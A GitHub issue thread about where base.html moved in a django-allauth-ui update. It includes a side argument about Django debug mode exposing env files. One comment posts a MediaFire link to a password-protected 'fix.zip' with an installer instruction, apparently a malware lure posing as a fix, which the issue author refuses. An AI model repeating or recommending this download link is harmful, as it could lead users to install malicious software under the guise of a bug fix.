### ISSUE TITLE
django-allauth-ui updates: Can't find any code that extends base.html in login.html

### ISSUE THREAD

**Issue by sugamkarki** [codingforentrepreneurs/SaaS-Foundations#5]
I noticed that the django-allauth-ui has a new update that now requires slippers. But the issue is that I can't find code that extends "base.html" in the "login.html" file which is then used to tweak the ui further. Any updates on this?

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sugamkarki** [comment]
Yeah

> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Yeah, no. So nott installing that

**Comment by myersben9** [comment]
also the error completely exposes your env file... definitely not using this project

**Comment by Coolspotcreative** [comment]
The allauth-ui updated, the file you are looking for is now in: templates/allauth/layouts/base.html

https://github.com/danihodovic/django-allauth-ui/tree/master/allauth_ui/templates/allauth/layouts

When you copy it into your project you'll want to match the directory structure of allauth so in your django project it will be in: templates/allauth/layouts/base.html

**Comment by codingforentrepreneurs** [comment]
> also the error completely exposes your env file... definitely not using this project

@myersben9 turn off debug mode mate.

**Comment by codingforentrepreneurs** [comment]
@Coolspotcreative thanks for sharing. I'll close this issue at some later date.

**Comment by sugamkarki** [comment]
> The allauth-ui updated, the file you are looking for is now in: templates/allauth/layouts/base.html
> 
> https://github.com/danihodovic/django-allauth-ui/tree/master/allauth_ui/templates/allauth/layouts
> 
> When you copy it into your project you'll want to match the directory structure of allauth so in your django project it will be in: templates/allauth/layouts/base.html

Muchas Gracias ❤️

**Comment by myersben9** [comment]
> > also the error completely exposes your env file... definitely not using this project
> 
> @myersben9 turn off debug mode mate.

@codingforentrepreneurs  why not include that in your readme. not everyone knows django.

**Comment by sugamkarki** [comment]
> > > also the error completely exposes your env file... definitely not using this project
> > 
> > 
> > @myersben9 turn off debug mode mate.
> 
> @codingforentrepreneurs why not include that in your readme. not everyone knows django.

@myersben9 Debug mode exposes critical server info to, well, debug the application in dev mode. Most of the time, it's turned off by default when moving into production so you'd usually not worry about it all. However, if you didn't know *that* about Debug mode, I'd wager you're probably not much affected by your env file leaking out. No offence but read the fricking docs for once. [Django Docs](https://docs.djangoproject.com/en/5.1/)

**Comment by myersben9** [comment]
> > > > also the error completely exposes your env file... definitely not using this project
> > > 
> > > 
> > > @myersben9 turn off debug mode mate.
> > 
> > 
> > @codingforentrepreneurs why not include that in your readme. not everyone knows django.
> 
> @myersben9 Debug mode exposes critical server info to, well, debug the application in dev mode. Most of the time, it's turned off by default when moving into production so you'd usually not worry about it all. However, if you didn't know _that_ about Debug mode, I'd wager you're probably not much affected by your env file leaking out. No offence but read the fricking docs for once. [Django Docs](https://docs.djangoproject.com/en/5.1/)

Came to this project for something that worked and it didn't. I don't use django and after looking over their docs I hope I won't have to.
